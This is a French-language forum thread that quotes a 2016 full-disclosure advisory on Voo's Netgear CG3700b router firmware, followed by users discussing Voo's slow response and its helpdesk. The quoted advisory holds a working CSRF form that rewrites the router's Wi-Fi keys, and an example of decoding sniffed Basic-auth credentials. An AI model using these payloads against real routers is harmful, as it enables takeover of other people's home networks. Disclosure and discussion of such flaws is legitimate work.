ADSL-BC

[FredHilbert]

Bonjour à tous,
L'auteur du CVE à besoin de capture d'écran. Si quelqu'un est dévoué...

Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.

Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index";
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>


Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.

Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD

SOURCE: http://seclists.org/fulldisclosure/2016/Apr/87

[FredHilbert]

La réaction très pro et priceless de la CM chez VOO:

[max]

Magnifique réaction des CM de Voo

[solar10]

Mouahahaha....
Gaffe quand même parce que je me souviens de deux couillons qui se sont retrouvés en GàV après avoir posté une faille de sécurité sur un blog public.

[roylion15]

Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...

[clear.be]

La réaction très pro et priceless de la CM chez VOO:

C'est une blague ???

[mackguil]

Je l'ai cherché mais n'ai pas remis la main dessus.

[clear.be]

[FredHilbert]

Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...

Dans ce cas précis je pense que le problème vient plutôt du firmware de VOO (et de la non-réactivité de son équipe de sécurité). J'ai pu parler avec l'auteur de la découverte. Il a prévenu VOO début janvier. Il a pas eu de réponse. Début mars nouvelle tentative avec PoC cette fois-ci. Réponse... 30 jours après. C'est d'ailleurs pour ça qu'il a fait une CVE.

De manière général je suis plutôt satisfait de VOO. Mais dans ce cas précis il faut dire qu'il traînent.

Netgear, pour le boulot je n'achète que ça pour les AP. Mais dans ce cas précis je pense que le 3700b n'y est pour (presque) rien.

[jojo]

Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...

C'est vrai que si "ça existe dans plein de routeurs du commerce", pourquoi s'en soucier ?

[mackguil]

Je voulais cette vidéo et la poster comme toi.

[mackguil]

Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...

C'est vrai que si "ça existe dans plein de routeurs du commerce", pourquoi s'en soucier ?

+1

[FredHilbert]

Je voulais cette vidéo et la poster comme toi.

Mackgui tu as oublié le fameux "est-ce que tu baise"?

ça aide pour la recherche

[tamika]

Ce qui est genant dans l'histoire ce n'est pas (trop) qu'il y ait un probleme mais qu'ils n'ont pas l'air de comprendre de quoi on parle.
Comme la fois ou je les ai appeles pour leur demander s'il n'y avait pas un probleme de route (j'avais fait un traceroute jusqu'a un serveur de jeu) et qu'ils m'ont repondu que VOO ne s'occupait pas des routes et que je devrais voir avec l'administration communale.
Veridique.

[solar10]

Ah quoi tu veux t'attendre quand tu tombes sur des ploucs intérimaires tout juste capable de suivre un script de questions. Tout ce qui sort de leur FAQ, c'est ... ingérable.

[roylion15]

Oui mais bon à une époque je suis d'accord qu'on pouvait tomber sur des personnes totalement ignares ... J'en ai fait l'expérience plusieurs fois mais bon maintenant cela s'est bien amélioré et le forum Voo est relativement efficace pour régler des soucis qu'ils soient administratifs ou techniques ...pour ce qui est du HD par téléphone je ne l'utilise plus jamais.

[FredHilbert]

ils m'ont repondu que VOO ne s'occupait pas des routes et que je devrais voir avec l'administration communale. Veridique.

AHAHAH You made my day !

Oui mais je vous trouve méchant là. OK au helpdesk 1er niveau ils lisent un script, genre "vous avez redémarré votre box monsieur"? Mais je suppose qu'il existe un second niveau compétant.

[roylion15]

Le niveau 2 ca n'a rien à voir effectivement et je ne parlerai pas du service pro qui est lui des plus compétent car je le côtoie pour le boulot ...

[FredHilbert]

roylion15 je vois dans ta signature que tu as le TECHNICOLOR TC7210 de VOO. Tu es content avec ?

J'envisage de changer mon Netgear CG3700b par celui là. J'ai demandé a VOO si ils avait laissé el firmware d'origine voici ce qu'il a répondu:


Est-ce que tu peux confirmer, tu as eu l'occasion de le "bricoler" un peu?

[cdl]

Priceless !!